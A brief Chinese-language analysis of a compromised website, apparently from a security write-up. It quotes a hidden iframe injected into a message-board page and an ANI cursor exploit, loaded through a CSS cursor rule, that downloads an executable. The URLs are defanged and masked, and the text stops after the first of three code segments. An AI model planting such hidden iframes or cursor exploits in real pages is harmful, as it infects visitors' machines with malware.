该网站的留言板页面:
/--- <Iframe id="fralyb" name="fralyb2" src="kh_lyb.aspx?user=2**5***" scrolling="auto" frameborder="0" width=100% height="100%"></iframe> ---/
被植入代码:
/--- <iframe src=hxxp://cool***.4*7*5***55.com/k3.htm width=100 height=1 frameborder=0></iframe> ---/
hxxp://cool***.4*7*5***55.com/k3.htm 包含3段恶意代码。
恶意代码段1:
/--- <DIV style="CURSOR: url(hxxp://cool***.4*7*5***55.com/9.gif)"></DIV></DIV> ---/
hxxp://cool***.4*7*5***55.com/9.gif (瑞星报为Hack.SuspiciousAni
)中包含信息:“By Mr.owen[F.S.T] ”,利用 ANI漏洞下载 xx.exe